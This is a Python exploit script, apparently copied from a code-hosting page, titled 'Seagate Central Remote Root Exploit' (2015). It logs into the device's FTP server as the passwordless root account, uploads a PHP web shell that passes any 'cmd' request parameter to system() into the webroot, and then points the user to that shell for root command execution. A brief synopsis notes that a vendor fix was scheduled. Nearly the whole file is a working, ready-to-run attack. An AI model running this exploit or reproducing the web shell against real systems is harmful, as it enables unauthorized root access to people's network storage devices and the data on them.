71 lines
No EOL
1.5 KiB
Python
Executable file
71 lines
No EOL
1.5 KiB
Python
Executable file
#!/usr/bin/python
|
|
# seagate_ftp_remote_root.py
|
|
#
|
|
# Seagate Central Remote Root Exploit
|
|
#
|
|
# Jeremy Brown [jbrown3264/gmail]
|
|
# May 2015
|
|
#
|
|
# -Synopsis-
|
|
#
|
|
# Seagate Central by default has a passwordless root account (and no option to change it).
|
|
# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
|
|
# From there, we can execute commands with root privileges as lighttpd is also running as root.
|
|
#
|
|
# -Fixes-
|
|
#
|
|
# Seagate scheduled it's updates to go live on April 28th, 2015.
|
|
#
|
|
# Tested Firmware Version: 2014.0410.0026-F
|
|
#
|
|
|
|
import sys
|
|
from ftplib import FTP
|
|
|
|
port = 21
|
|
|
|
php_shell = """
|
|
<?php
|
|
if(isset($_REQUEST['cmd']))
|
|
{
|
|
$cmd = ($_REQUEST["cmd"]);
|
|
echo "<pre>$cmd</pre>";
|
|
system($cmd);
|
|
}
|
|
?>
|
|
"""
|
|
|
|
php_shell_filename = "shell.php"
|
|
seagate_central_webroot = "/cirrus/"
|
|
|
|
def main():
|
|
if(len(sys.argv) < 2):
|
|
print("Usage: %s <host>" % sys.argv[0])
|
|
return
|
|
|
|
host = sys.argv[1]
|
|
|
|
try:
|
|
with open(php_shell_filename, 'w') as file:
|
|
file.write(php_shell)
|
|
|
|
except Exception as error:
|
|
print("Error: %s" % error);
|
|
return
|
|
|
|
try:
|
|
ftp = FTP(host)
|
|
ftp.login("root")
|
|
ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
|
|
ftp.close()
|
|
|
|
except Exception as error:
|
|
print("Error: %s" % error);
|
|
return
|
|
|
|
print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))
|
|
|
|
return
|
|
|
|
if __name__ == "__main__":
|
|
main() |